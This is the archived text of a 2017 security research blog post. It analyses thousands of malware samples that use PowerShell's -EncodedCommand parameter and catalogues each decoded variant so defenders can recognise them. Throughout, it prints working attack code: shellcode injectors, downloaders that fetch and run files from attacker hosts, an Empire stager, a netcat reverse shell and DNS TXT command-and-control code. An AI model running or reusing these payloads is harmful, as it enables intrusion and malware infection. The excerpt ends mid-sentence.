{
	"id": "170636a0-ecd2-4311-b967-6070df5d9ebc",
	"created_at": "2026-04-06T00:15:38.062094Z",
	"updated_at": "2026-04-10T03:20:16.123308Z",
	"deleted_at": null,
	"sha1_hash": "c5f50fa4f8e7ea98d131b935b5f7b6677147d975",
	"title": "Pulling Back the Curtains on EncodedCommand PowerShell Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 981272,
	"plain_text": "Pulling Back the Curtains on EncodedCommand PowerShell Attacks\r\nBy Jeff White\r\nPublished: 2017-03-10 · Archived: 2026-04-05 18:50:13 UTC\r\nA note to readers: The code samples included within this blog post may trigger alerts from your security software. Please\r\nnote that this does not indicate an infection or an attack; rather, it is a notification that the code could be malicious if it were\r\nlive.\r\nPowerShell has continued to gain in popularity over the past few years as the framework continues to mature, so it’s no\r\nsurprise we’re seeing it in more attacks. PowerShell offers attackers a wide range of capabilities natively on the system and\r\nwith a quick look at the landscape of malicious PowerShell tools flooding out; you have a decent indicator of its growth.\r\nMicrosoft has done a fantastic job in later versions of PowerShell by giving multiple ways to log PowerShell activity\r\n(Transcription, ScriptBlock, etc) so there has been a shift to try and further obfuscate attacks at runtime.\r\nEnter stage left - the PowerShell ‘-EncodedCommand’ parameter!\r\n-EncodedCommand\r\n    Accepts a base64-encoded string version of a command. Use this parameter\r\n    to submit commands to Windows PowerShell that require complex quotation\r\n    marks or curly braces.\r\nAs shown above from the PowerShell Help output, it’s a command intended to take complex strings that may otherwise\r\ncause issues for the command-line and wrap them up for PowerShell to execute. By masking the “malicious” part of your\r\ncommand from prying eyes you can avoid strings that may tip-off the defense.\r\nThe purpose of this blog will be two-fold. First, in the “Analysis Overview”, I will be analyzing 4,100 recent samples\r\nidentified within Palo Alto Networks AutoFocus that employ this EncodedCommand technique to see how PowerShell is\r\nbeing used and what techniques are being used in the wild for PowerShell attacks. 
Second, I will be using this blog to\r\ncatalog the PowerShell code with examples of each decoded sample to aid in future identification or research.\r\nAnalysis Overview\r\nTo perform this analysis, I needed to first identify samples that were using this technique. Because PowerShell gives you a\r\nlot of flexibility when it comes to calling different parameters, identifying samples isn’t as straightforward as one might\r\nexpect.\r\nBelow are three examples of different ways the EncodedCommand parameter can be called:\r\n1. Fully spelled out:\r\npowershell.exe -EncodedCommand ZQBjAGgAbwAgACIARABvAHIAbwB0AGgAeQAiAA==\r\n2. Truncated with alternate capitalization:\r\npowershell.exe -eNco ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA=\r\n3. Using caret escape-character injection to break up the string:\r\npowershell.exe -^e^C^ ZQBjAGgAbwAgACIAVwBpAHQAYwBoACIA\r\nThere are well over 100,000 variations possible by using combinations of these methods for the “EncodedCommand”\r\nparameter alone. Keeping that in mind, I came up with the below regex that gave decent coverage to the possible variants\r\nand could easily be applied to a huge corpus of dynamic analysis reports.\r\n\\-[Ee^]{1,2}[NnCcOoDdEeMmAa^]+ [A-Za-z0-9+/=]{5,}\r\nThis allows for extraction of lines like the below at scale for further analysis.\r\npowerShell.exe  -WindowStyle hiddeN -ExecuTionPolicy ByPasS -enc\r\ncgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6\r\nAC8ALwAxADkAMgAuADEANgA4AC4ANAA4AC4AMQAyADkALwB0AGUAcwB0AC4\r\nAagBwAGcAIABzAGMAcgBvAGIAagAuAGQAbABsAAoA\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 1 of 35\n\nNow, it’s no surprise that the majority of the encoded data is clearly generated from templates and public tools - attackers\r\naren’t re-inventing the wheel every time they need to run shellcode or download another malicious file.  
This is evidenced\r\nby the fact that the underlying code is almost identical with just slight adjustments to download locations and the like. To try\r\nand perform analysis on the data then, I needed to try and identify the code and attempt to determine what generated the\r\ncode, or at minimum, attempt to cluster the code into like-buckets.\r\nProfiling Approach\r\nTo illustrate some of the difficulties involved with this, back in 2012 Matthew Graeber published a blog post about a\r\nPowerShell script he put together that could load shellcode into memory and execute it. This script has been the cornerstone\r\ntemplate for this technique, being used in most public tools that seek to use this functionality.\r\nFollowing are two iterations of the technique from TrustedSec tools Social-Engineer Toolkit (SET) and Magic Unicorn. If\r\nyou compare the two samples, you’ll see that SET uses “$c” whereas Magic Unicorn uses “$nLR” for the initial variable.\r\nSimilarly, the “$size” variable in SET is “$g” in Magic Unicorn, the “$sc” variable is “$z”, and finally the “$x” variable is\r\n“$kuss”.\r\nSET\r\n$c = '[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint\r\nflAllocationType, uint flProtect);[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr\r\nlpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr\r\nlpThreadId);[DllImport(\"msvcrt.dll\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$w = Add-Type -memberDefinition $c -Name \"Win32\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = ;$size =\r\n0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le\r\n($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;)\r\n{Start-sleep 60};\r\nMagic Unicorn\r\n$nLR = 
'[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint\r\nflAllocationType, uint flProtect);[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr\r\nlpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr\r\nlpThreadId);[DllImport(\"msvcrt.dll\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$w = Add-Type -memberDefinition $nLR -Name \"Win32\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = ;$g =\r\n0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$kuss=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le\r\n($z.Length-1);$i++) {$w::memset([IntPtr]($kuss.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$kuss,0,0,0);for\r\n(;;){Start-sleep 60};\r\nIn Magic Unicorn, there is a line within the generating script that randomizes some variables. Below is an excerpt showing\r\nhow this works.\r\nvar1 = generate_random_string(3, 4)\r\nvar2 = generate_random_string(3, 4)\r\npowershell_code = (\r\n        r\"\"\"$1 = '$c = ''[DllImport(\"kernel32.dll\")]public static extern IntPtr …\r\npowershell_code = powershell_code.replace(\"$1\", \"$\" + var1).replace(\"$c\", \"$\" + var2).replace(\"$2\", \"$\" + var3) …\r\nThis simply replaces some variables with a string of 3-4 random alphanumeric characters; however, not all variables get\r\nreplaced so the combination of the random string with known anchors allows me to theorize how it was generated.\r\nAlternatively, I can also see when it looks like this particular piece of code was copied into another tool without the\r\nrandomization part of the Magic Unicorn script as the variables don’t change or was further built upon by adding additional\r\nrandomization.\r\nIt’s not an exact science and, when dealing with code that has been heavily re-used over many years by many different\r\npeople, you’re bound to run into scenarios where the code just doesn’t lend itself well 
to profiling. I’ve attempted to classify\r\nit as accurately as possible but a word of caution - take the specific names with a grain of salt throughout this analysis as\r\nnothing is stopping someone simply copying and pasting the code into their own tool.\r\nIn total, I profiled 27 clusters of public tools or capabilities, which had unique identifiers to separate them from the\r\nrest. I’ll get into each of them later as I catalog each variant but, for now, the below table offers a breakdown of the variants,\r\nhow many samples matched, and the overall percentage each accounted for in the sample set.\r\nVariant Count % of Total\r\nDownloader DFSP 1,373 33.49%\r\nShellcode Inject 1,147 27.98%\r\nUnicorn 611 14.90%\r\nPowerShell Empire 293 7.15%\r\nSET 199 4.85%\r\nUnknown 104 2.54%\r\nPowerfun Reverse 100 2.44%\r\nDownloader DFSP 2X 81 1.98%\r\nDownloader DFSP DPL 24 0.59%\r\nDownloader IEXDS 19 0.46%\r\nPowerWorm 19 0.46%\r\nUnicorn Modified 14 0.34%\r\nScheduled Task COM 11 0.27%\r\nBITSTransfer 11 0.27%\r\nVB Task 10 0.24%\r\nTXT C2 10 0.24%\r\nDownloader Proxy 9 0.22%\r\nAMSI Bypass 8 0.20%\r\nVeil Stream 7 0.17%\r\nMeterpreter RHTTP 6 0.15%\r\nDynAmite Launcher 6 0.15%\r\nDownloader Kraken 5 0.12%\r\nAppLocker Bypass 4 0.10%\r\nPowerSploit GTS 3 0.07%\r\nPowerfun Bind 2 0.05%\r\nRemove AV 2 0.05%\r\nDynAmite KL 1 0.02%\r\nOver half of the samples analyzed utilized either a generic “DownloadFile-StartProcess” technique or a variant of the\r\nshellcode injection technique shown previously.\r\nGeneral Distribution / Stats\r\nAcross the 4,100 samples, there were 4 file formats seen.\r\nFile Format Count % of Total\r\n\"exe\" 2,154 52.54%\r\n\"doc\" 1,717 41.88%\r\n\"xls\" 228 5.56%\r\n
\"dll\" 1 0.02%\r\nEXE and DOC format account for the majority of extensions used across this sample set. Looking further at the DOC files,\r\n77% of them, 1,326, matched the “Downloader DFSP” variant, which defines a generic downloader using the\r\nDownloadFile-StartProcess method as shown below.\r\n(New-Object\r\nSystem.Net.WebClient).DownloadFile('http://94.102.53.238/~yahoo/csrsv.exe',\"$env:APPDATA\\csrsv.exe\");Start-Process (\"$env:APPDATA\\csrsv.exe\")\r\nPivoting from there, 1,159 of those DOC files (87%) match known patterns for Cerber ransomware; the implication is that a\r\ntool is being used to generate the malicious Microsoft Word Documents that create the macro which launches PowerShell\r\nwith this technique as the template.\r\nThe primary method of delivery across the DOC samples is SMTP/POP3, which aligns with the status quo of delivering\r\nransomware by using malicious Microsoft Word Documents via e-mail campaigns.\r\nFigure 1 Applications used to deliver malicious Powershell Word Documents\r\nLooking at the target industries also shows a fairly even distribution throughout Higher Education, High Tech, Professional\r\nand Legal Services, and Healthcare.\r\nFigure 2 Breakdown of Industries detecting malicious Powershell Word Documents\r\nA quick look at the distribution over time also shows a number of large spikes that, again, align with the standard operating\r\nprocedure of e-mail campaigns.\r\nFigure 3 Number of malicious Powershell Word Documents captured in AutoFocus over the last 12 months\r\nLooking at how the EXE samples were classified, nothing stands out as being dominant in terms of a group or malware\r\nfamily; however, interestingly enough there seems to be a preference for targeting companies in the High Tech industry.\r\nFigure 4 Breakdown of Industries detecting malicious Executables 
using Powershell\r\nThe distribution over time is also fairly even in comparison to the DOC sample distribution over time.\r\nFigure 5 Number of malicious Executables using Powershell captured in AutoFocus over the last 12 months\r\nOne possible explanation for this is a variation in distribution. For example, while DOC samples were primarily seen as\r\nattachments to e-mail, EXE samples were usually delivered through Web Browsing.\r\nThe last item I’ll touch on before diving into the commands themselves is the one DLL file that was detected using the\r\nEncodedCommand technique. This DLL contains no exports but when called with the DllMain entry point will simply\r\nlaunch a PowerShell Empire stager which downloads an XOR’d script from a website and then uses PowerShell’s Invoke-Expression cmdlet to run the downloaded script. This sample was related to the Odinaff family that Symantec blogged about\r\nin October 2016.\r\nPre-Analysis Data / Stats\r\nBefore looking at the base64 encoded data, I looked at how each process was launched. This frequency analysis and\r\ninspection gives some insight into what additional parameters are being used alongside EncodedCommand.\r\nEncodedCommand: (4,100 Samples – 100% Coverage)\r\nUsed to pass a base64 encoded string to PowerShell for execution.\r\nFlag Count % of Total\r\n\"-enc\" 3,407 83.29%\r\n\"-Enc\" 412 10.05%\r\n\"-EncodedCommand\" 229 5.59%\r\n\"-encodedcommand\" 40 0.98%\r\n\"-encodedCommand\" 7 0.17%\r\n\"-ec\" 3 0.07%\r\n\"-en\" 1 0.02%\r\n\"-ENC\" 1 0.02%\r\nWindowStyle Hidden: (2,083 Samples – 50.8% Coverage)\r\nUsed to prevent PowerShell from displaying a window when it executes code. 
The most used variant “-window hidden” is\r\ndue to the PowerShell command that the previously mentioned Microsoft Word Documents distributing Cerber are using.\r\nFlag Count % of Total\r\n\"-window hidden\" 1,267 30.90%\r\n\"-W Hidden\" 315 7.68%\r\n\"-w hidden\" 159 3.88%\r\n\"-windowstyle hidden\" 125 3.05%\r\n\"-win hidden\" 67 1.63%\r\n\"-WindowStyle Hidden\" 45 1.10%\r\n\"-win Hidden\" 42 1.02%\r\n\"-wind hidden\" 40 0.98%\r\n\"-WindowStyle hidden\" 5 0.12%\r\n\"-WindowStyle hiddeN\" 5 0.12%\r\n\"-windows hidden\" 4 0.10%\r\n\"-Win Hidden\" 3 0.07%\r\n\"-win hid\" 2 0.05%\r\n\"-Window hidden\" 2 0.05%\r\n\"-Wind Hidden\" 1 0.02%\r\n\"-Win hidden\" 1 0.02%\r\nNonInteractive: (1,405 Samples – 42.4% Coverage)\r\nUsed to prevent creating an interactive prompt for the user. Used in combination with WindowStyle Hidden to hide signs of\r\nexecution. For the “-noni” variation, 76% were the generic shellcode injection code and SET, whereas “-NonI” was\r\nPowerShell Empire.\r\nFlag Count % of Total\r\n\"-noni\" 1,042 25.41%\r\n\"-NonI\" 331 8.07%\r\n\"-noninteractive\" 27 0.66%\r\n\"-NonInteractive\" 4 0.10%\r\n\"-nonI\" 1 0.02%\r\nNoProfile: (1,350 Samples – 32.9% Coverage)\r\nPrevents PowerShell from loading profile scripts, which get executed on launch, so as to avoid potentially unwanted\r\ncommands or settings. Similar to the breakdown for NonInteractive, “-nop” is primarily SET and the generic shellcode\r\ninjection while “-NoP” is PowerShell Empire.\r\nFlag Count % of Total\r\n\"-nop\" 955 23.29%\r\n\"-NoP\" 332 8.10%\r\n\"-noprofile\" 57 1.39%\r\n\"-NoProfile\" 5 0.12%\r\n\"-noP\" 1 0.02%\r\nExecutionPolicy ByPass: (453 Samples – 11% Coverage)\r\nBypasses the default PowerShell script execution policy (Restricted) and will not block the execution of any scripts or create\r\nany prompts. 
It’s interesting to note that code passed via the EncodedCommand parameter is not subject to the\r\nexecution policy.\r\nFlag Count % of Total\r\n\"-ep bypass\" 128 3.12%\r\n\"-exec bypass\" 80 1.95%\r\n\"-executionpolicy bypass\" 78 1.90%\r\n\"-Exec Bypass\" 73 1.78%\r\n\"-ExecutionPolicy ByPass\" 42 1.02%\r\n\"-ExecutionPolicy bypass\" 26 0.63%\r\n\"-Exec ByPass\" 9 0.22%\r\n\"-ExecutionPolicy Bypass\" 5 0.12%\r\n\"-ExecuTionPolicy ByPasS\" 4 0.10%\r\n\"-exe byPass\" 2 0.05%\r\n\"-ep Bypass\" 2 0.05%\r\n\"-ExecutionPolicy BypasS\" 2 0.05%\r\n\"-Exe ByPass\" 2 0.05%\r\nSta: (219 Samples - 5.3% Coverage)\r\nUses single-threaded apartment (now default as of PowerShell 3.0). This parameter was almost exclusively used in\r\nPowerShell Empire.\r\nFlag Count % of Total\r\n\"-sta\"  219  5.34%\r\nNoExit: (23 Samples - 0.5% Coverage)\r\nPrevents PowerShell from exiting after running the startup commands. This was exclusively used by the PowerWorm\r\nmalware and was the only parameter used beside EncodedCommand.\r\nFlag Count % of Total\r\n\"-noexit\"  23  0.56%\r\nExecutionPolicy Hidden (5 Samples - 0.12% Coverage)\r\nThis actually isn’t a valid policy so PowerShell just ignores it. Every usage of it is related to a script I labeled “TXT C2”,\r\nwhich attempts to load a DNS TXT Record containing another PowerShell script, similar to PowerWorm. 
Most likely, the\r\nattacker meant to use ByPass here as they already have “-w hidden” later in their command.\r\nFlag Count % of Total\r\n\"-ep hidden\"  5  0.12%\r\nNoLogo: (33 Samples - 0.8% Coverage)\r\nHides the copyright banner when PowerShell launches.\r\nFlag Count % of Total\r\n\"-Nol\" 10 0.24%\r\n\"-NoL\" 10 0.24%\r\n\"-nologo\" 9 0.22%\r\n\"-nol\" 4 0.10%\r\nExecutionPolicy Unrestricted (1 Sample – 0.02% Coverage)\r\nSimilar to ByPass, but will warn the user before running unsigned scripts downloaded from the Internet. The underlying\r\nlone script that used this parameter tries to execute a script downloaded from the Internet, which should generate a warning.\r\nFlag Count % of Total\r\n\"-ExecutionPolicy Unrestricted\"  1  0.02%\r\nCommand (1 Sample – 0.02% Coverage)\r\nExecutes the command that follows the parameter as if it were typed at the PowerShell prompt. I only saw one instance of\r\nthis and it was tied directly to a piece of malware that FireEye included in a blog about evading signature-based detections.\r\nThe PowerShell code is included in the “Comments” field of a DOCM file and launched from a macro inside a Microsoft\r\nWord document. 
Below is the code in question that chains together multiple commands to perform an FTP transfer and\r\nsubsequent NetCat connection.\r\npowershell -noP -nonI -Win hidden -c sc ftp.txt -val \\\"open\\\" -enc ascii; ac ftp.txt -val \\\"192.168.52.129\\\" -enc ascii;\r\nac ftp.txt -val \\\"test\\\" -enc ascii; ac ftp.txt -val \\\"test\\\" -enc ascii; ac ftp.txt -val \\\"bin\\\" -enc ascii; ac ftp.txt -val\r\n\\\"GET\\\" -enc ascii; ac ftp.txt -val \\\"nc.exe\\\" -enc ascii; ac ftp.txt -val \\\"nc.exe\\\" -enc ascii; ac ftp.txt -val \\\"bye\\\" -enc\r\nascii; ftp -s:ftp.txt; rm ftp.txt; ./nc.exe -e powershell.exe 192.168.52.129 3724\r\nFlag Count % of Total\r\n\"-c\"  1  0.02%\r\nFinally, I’ll end the parameter analysis by looking briefly at the top 10 combinations seen throughout this sample set.\r\nFlag Combination Count % of Total\r\n\"-window hidden -enc\" 1,242 30.29%\r\n\"-enc\" 986 24.04%\r\n\"-nop -noni -enc\" 736 17.95%\r\n\"-NoP -sta -NonI -W Hidden -Enc\" 206 5.02%\r\n\"-EncodedCommand\" 169 4.12%\r\n\"-ep bypass -noni -w hidden -enc\" 102 2.48%\r\n\"-NoP -NonI -W Hidden -Enc\" 60 1.46%\r\n\"-nop  -win hidden -noni -enc\" 57 1.39%\r\n\"-executionpolicy bypass -windowstyle hidden -enc\" 51 1.24%\r\n\"-nop -exec bypass -win Hidden -noni -enc\" 41 1.00%\r\nEven accounting for changes in case, the results only increase by a handful of samples in each category.\r\nWhile doing the research to try and identify unique signatures for identification, I found multiple examples of the below,\r\nwherein the code author changes the parameters for a newer version of their tool.\r\nFigure 6 Code Author Modified parameters between versions of a tool\r\nThis reduces the overall aggregate count for those families but I don’t believe it has much impact on the totals. 
In my review\r\nof the tools, authors are less focused on the dynamic ordering of the parameters or potentially dynamically adjusting\r\nparameter length to further obscure their attacks; instead they add in basic capitalization randomization and focus on the\r\n“meat” of their code. This can allow for some low-fidelity profiling based on just the way the PowerShell command is\r\nlaunched.\r\nIn addition, the top three combinations, which account for 72% of all combinations, are predominately straightforward and\r\nfocused on just running code versus any clever attempts at further hiding their attacks from the user.\r\nPost-Analysis Data / Stats\r\nNext I’ll go over each of the identified variants and review their functionality. For each one that downloads a file or script,\r\nI’ll include the observed IP/Domain/URL at the end of this blog. Some of these may be malicious, some of them may be\r\npentesters, and some of them may be people doing random testing of new techniques; unfortunately, it’s not usually possible\r\nto infer intention when doing bulk analysis but the data is provided for the reader to use as they see fit.\r\nDownloaders\r\nPowerShell code identified with the primary intention of downloading and running a secondary payload or executing\r\nPowerShell code obtained remotely.\r\nDownloader DFSP (1,373 Samples - 33.49% Coverage)\r\nThis is a quintessential example of using PowerShell to download and run a file. It’s basically verbatim of the results you get\r\nwhen using Google to search for ways to download and run a file. 
As such, I’ve used the below template as a generic\r\nclassification for the base64 encoded data that acts as a simple downloader for the true payload.\r\n(New-Object System.Net.WebClient).DownloadFile('http://cajos[.]in/0x/1.exe','mess.exe');Start-Process 'mess.exe'\r\nAs was previously pointed out, almost all of the detections matching this category were linked back to the Microsoft Word\r\ndocuments launching this PowerShell command via a macro to download Cerber. One unique pattern observed in this\r\nsample was the usage of environment variables, in addition to their URI pattern.\r\nDownloader for Cerber –\r\n(New-Object\r\nSystem.Net.WebClient).DownloadFile('http://94.102.53[.]238/~yahoo/csrsv.exe',\"$env:APPDATA\\csrsv.exe\");Start-Process (\"$env:APPDATA\\csrsv.exe\")\r\nPowerShell Empire (293 Samples – 7.15% Coverage)\r\nFor this next one, the samples are using PowerShell Empire’s EncryptedScriptDropper to download a script remotely and\r\ndecrypt it with an embedded XOR key.\r\n$Wc=NeW-ObjeCt SySTEM.Net.WebCLiEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like\r\nGecko';$WC.HeadeRS.ADd('User-Agent',$u);$wc.PrOxy =\r\n[SyStem.NeT.WEbReQUeSt]::DEFauLTWeBProxy;$WC.PRoXY.CrEdENTIaLS =\r\n[SYStEM.NeT.CReDEnTiALCaChE]::DEFaulTNeTworKCREdeNtiaLS;$K='0192023a7bbd73250516f069df18b500';$i=0;\r\n[CHAr[]]$B=([CHaR[]]($wc.DOwnloaDSTRing(\"http://23.239.12.15:8080/index.asp\")))|%{$_-\r\nBXOr$k[$i++%$K.LENgTh]};IEX ($B-jOIn'')\r\nIn this example, the XOR key is “0192023a7bbd73250516f069df18b500” and the pulled down script, once decoded with\r\nthat key, is the PowerShell Empire agent stager script that will POST system information to the C2 server and then\r\ndownload the encrypted Stage 1 Empire payload.\r\n'FunCtION StaRt-NegoTiATe{param($s,$SK,$UA=\"lol\")Add-TypE -AsSeMBLY SYSteM.SECUriTY;AdD-TypE -aSSEMBly 
SYSTEm.CoRe;$Err\r\n\"SilentlyContinue\";$E=[SYstem.TExT.ENCoDING]::ASCII;$AES=NeW-OBjecT SYsTeM.SeCURiTy.CRyptoGrapHY.AESCRyPToSeRVicePrOvI\r\nRandOm -coUNt 16;$AES.Mode=\"CBC\"; $AES.Key=$e.GetBytes($SK); $AES.IV = $IV;$cSp = NEW-OBJECT SYStEM.SecURity.CrYPtOGRA\r\n$cSP.FlagS -boR [SYsTeM.SeCurITY.CryptogRaphy.CsPPROViDErFlAGs]::UsEMAcHINEKeySTore;$Rs = NEW-ObJecT\r\nSySTEm.SecURIty.CRyptograPHy.RSACRYPTOSERvICEPROViDeR -ARGuMenTLIsT 2048,$CSP;$rk=$Rs.TOXMlStriNg($FALse);$r=1..16|FO\r\nMAx 26};$ID=(\\'ABCDEFGHKLMNPRSTUVWXYZ123456789\\'[$r] -joIN\r\n\\'\\');$iB=$E.gEtbYTes($Rk);$eb=$IV+$AES.CReaTeENCRyptoR().TRANSFoRmFiNalBLOcK($Ib,0,$Ib.LENgtH);IF(-Not $wc){$wc=nEw-oBJE\r\nsYstEM.Net.WEBCLient;$WC.ProxY = [SySTem.NET.WeBReqUEsT]::GETSysTeMWEbPRoxY();$Wc.Proxy.CrEDentIals =\r\n[SYStem.Net.CredENtIalCAche]::DEFAUlTCRedentIaLs;}$wc.Headers.Add(\"User-Agent\",$UA);$wc.Headers.Add(\"Cookie\",\"SESSIONID=$ID\");$raw=$wc.UploadData($s+\"index.jsp\",\"POST\",$eb);$dE=$E.GETSTRing($Rs.deC\r\n-joIN\\'\\';$KeY=$dE[10..$de.LengTH] -jOIn \\'\\';$AES=NEw-ObJEct SYsTEm.SEcurity.CRyPtoGRAPHY.AEsCrYPtOSerVIcEPRoVidEr;$IV = [By\r\n16;$AES.Mode=\"CBC\"; $AES.Key=$e.GetBytes($key); $AES.IV = $IV;$i=$S+\\'|\\'+[EnvIrONment]::UsERDOmAInNAmE+\\'|\\'+[ENvIRonmeNt]:\r\n[ENvIRONmeNt]::MaChinEName;$P=(gwMi WIN32_NeTWorkAdAPTErCoNfIGurAtioN|WherE{$_.IPAdDRess}|SelECt -ExpANd IPADDReSS\r\n[$P.LeNgTh -lt 6];If(!$IP -or $ip.trIm() -EQ \\'\\') {$Ip=\\'0.0.0.0\\'};$i+=\"|$ip\";$I+=\\'|\\'+(GEt-WmIOBJect WIn32_OpERAtiNgSystEM).NAME.splIT(\r\n[0];if(([Environment]::UserName).ToLower() -eq \"system\"){$i+=\\'|True\\'}else {$i += \"|\" +([Security.Principal.WindowsPrincipal]\r\n[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] \"Administrator\")}$n=\r\n[SySTeM.DIAgNoSTICS.ProceSS]::GetCUrREntPRocEss();$i+=\\'|\\'+$n.PROCEssNAMe+\\'|\\'+$n.ID;$I += \\'|\\' 
+\r\n$PSVerSIOnTabLe.PSVerSioN.MAjOR;$ib2=$E.getbYteS($I);$EB2=$IV+$AES.CrEATEEncrYPToR().TrANSFORmFinALBLOCk($Ib2,0,$Ib2.L\r\nAgent\",$UA);$raw=$wc.UploadData($s+\"index.php\",\"POST\",$eb2);$AES=NeW-Object SYSteM.SEcuRIty.CRYPToGrapHY.AesCrYPToSeRVIcE\r\n$rAw[0..15];$AES.Key=$e.GETBYtes($key);$AES.IV = $IV;IEX $([SYstEM.TeXt.EnCoDInG]::ASCII.GetStrInG(\r\n$($AES.CrEateDECRYpTOr().TRANsFOrMFinAlBloCk($rAW[16..$RaW.LENGtH],0,$raw.LENGth-16))));$AES=$NuLL;$s2=$NuLl;$WC=$nUll;$eB2=$nULl;$RAW=$NuLl;$IV=$NULL;$WC=$NULl;$I=$NUlL;$iB2=$null;[GC]::COlLEcT();In\r\n[0..2] -join \"/\") -SessionKey $key -SessionID $ID -Epoch $epoch;} Start-Negotiate -s \"http://23.239.12.15:8080/\" -SK \\'0192023a7bbd73250516f06\r\nDownloader DFSP 2X (81 Samples - 1.98% Coverage)\r\nThis is the same as the previous downloader but it launches yet another instance of PowerShell to carry out the download.\r\nThese were all linked to the Cerber downloader documents as well.\r\nPowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object\r\nSystem.Net.WebClient).DownloadFile('http://93.174.94[.]135/~kali/ketty.exe', $env:APPDATA\\profilest.exe );Start-Process ( $env:APPDATA\\profilest.exe )\r\nDownloader DFSP DPL (24 Samples - 0.59% Coverage)\r\nAnother downloader using the DownloadFile -\u003e Start-Process technique that had two different variations within the sample\r\nset. 
A number of these samples matched behaviors related to Bartalex and may be indicative of changes to this well-known\r\nOffice Macro generator.\r\nUnabridged –\r\n($deploylocation=$env:temp+'fleeb.exe');(New-Object\r\nSystem.Net.WebClient).DownloadFile('http://worldnit[.]com/abu.exe', $deploylocation);Start-Process\r\n$deploylocation\r\nAbridged –\r\n($dpl=$env:temp+'f.exe');(New-Object System.Net.WebClient).DownloadFile('http://alonqood[.]com/abacom.exe',\r\n$dpl);Start-Process $dpl\r\nDownloader IEXDS (19 Samples – 0.46% Coverage)\r\nThis is another spin on a downloader that frequently pops up when searching for methods to download and execute scripts\r\nfor PowerShell. Effectively, the code simply downloads a PowerShell script remotely and executes it with Invoke-Expression. The resulting payloads can be quite different from one another and didn’t seem related.\r\nThe following two samples download an “Invoke-TwitterBot” script, which is “A Trojan bot controlled by a twitter account\r\nthat was released at ShmooCon IX”.\r\nIEX (New-Object Net.WebClient).DownloadString('http://cannot.loginto[.]me/googlehelper.ps1')\r\niex ((New-Object Net.WebClient).DownloadString('http://76.74.127[.]38/default-nco.html'))\r\nBITSTransfer (11 Samples – 0.27% Coverage)\r\nAnother mechanism for downloading malware via PowerShell is through the BitsTransfer module. Background Intelligent\r\nTransfer Service (BITS) isn’t as frequently seen in downloading malware but offers similar functionality to other known\r\ntransfer services, such as HTTP. 
Using this different method may allow attackers to avoid certain monitoring and take\r\nadvantage of the fact that BITS will throttle transfers to not impact other bandwidth usage.\r\nIn my previous blog, I noted that a variant of the Cerber downloader was seen using BITS for a brief period of time and 10\r\nout of these 11 samples were Microsoft Word documents leading to Cerber.\r\nImport-Module BitsTransfer\r\n$path = [environment]::getfolderpath(\"mydocuments\")\r\nStart-BitsTransfer -Source \"http://94.102.50[.]39/keyt.exe\" -Destination \"$path\\keyt.exe\"\r\nInvoke-Item  \"$path\\keyt.exe\"\r\nTXT C2 (10 Samples – 0.24% Coverage)\r\nFor this next one, the attacker uses PowerShell to make a DNS query for the TXT record of a domain. The TXT record\r\ncontains another PowerShell script that is then passed to Invoke-Expression to execute.\r\nif(''+(nslookup -q=txt p.s.os.ns.rankingplac[.]pl) -match '@(.*)@'){iex $matches[1]}\r\nLooking at the script which is returned shows that once this initial look-up occurs, it will set itself into a constant loop\r\ncontinuing to query for the TXT record of the domain and base64 decoding then executing the result.\r\nNon-authoritative answer:\r\np.s.os.ns.rankingplac.pl text = \"@$str=''\\;$i=1\\;while(1){if(''+(nslookup -q=txt \\\"l.$i.ns.rankingplac[.]pl.\\\") -match\r\n'@(.*)@'){$str += [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($matches[1]))}\r\nelse {break\\;}$i++}iex $str@\"\r\nThis allows the attacker to establish a command and control channel when they are ready to interact with the compromised\r\nsystem.\r\nJohn Lambert over at Microsoft recently tweeted about this variant and identified it as being used during penetration testing.\r\nAnother example of the technique can be found in the Nishang framework for penetration testing.\r\nDownloader Proxy (9 Samples – 0.22% Coverage)\r\nThis variant will explicitly use the configured proxy and credentials for the user running the PowerShell 
